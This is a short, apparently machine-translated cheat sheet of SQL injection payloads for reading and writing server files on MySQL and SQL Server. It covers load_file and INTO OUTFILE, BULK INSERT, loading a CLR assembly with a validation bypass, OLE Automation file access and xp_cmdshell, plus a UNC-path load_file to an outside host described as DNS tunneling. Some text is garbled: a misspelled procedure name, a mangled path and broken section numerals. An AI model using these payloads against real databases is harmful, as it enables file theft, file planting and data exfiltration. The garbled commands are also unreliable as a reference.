Summary of the methods for reading and writing files in SQL injection, and summary of SQL Injection reading and writing

Summary of the methods for reading and writing files in SQL injection, and summary of SQL Injection reading and writing

Preface

SQL Injection includes direct SQL injection and file read/write injection. This article describes the content of file read/write in SQL injection. Let's take a look at it.

I. MySQL

Read files

Common read files can be replaced by a string in hexadecimal notation.

Select load_file ('C:/boot. ini ') select load_file (0x633a2f626f6f742e696e69) select load_file (' // ecma. io/1.txt ') # select load_file (' \\\\ ecma. io \ 1.txt ') # used for DNS Tunneling

Write files

I currently know two file writing methods:

select 0x313233 into outfile 'D:/1.txt'

select 0x313233 into dumpfile 'D:/1.txt'

Ii. SQL Server

Read files

1. BULK INSERT

create table result(res varchar(8000));bulk insert result from 'd:/1.txt';

2. CLR Integration

// Enable CLR integration exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'clr enabled', 1 reconfigure

create assembly sqb from 'd:\1.exe' with permission_set=unsafe

The above statement can use the create assembly function to load any. NET binary file from the remote server to the database. However, it will verify whether it is a valid. NET Program, leading to failure. The following is the read method.

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

Bypass: First load a valid. NET binary file, and then append the file. The following is a bypass method.

create assembly sqb from 'd:\net.exe';alter assembly sqb add file from 'd:\1.txt'alter assembly sqb add file from 'd:\notnet.exe'

3. script. FileSystemObject

# Enable Ole Automation Procedures sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure 'ole Automation Procedures ', 1; RECONFIGURE;

declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1exec @ret = sp_onmethod @f, 'readline', @line outwhile(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

Write files

1. script. FileSystemObject

declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. bcpcopy file (test failure, no bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

Iii. Oracle

Pass, Oracle is too pitfall ~~~ Almost all of them are restricted by PL/SQL.

Summary

The above is a summary of the reading and writing methods of SQL Injection files. I hope the content in this article will help you in your study or work. If you have any questions, you can leave a message.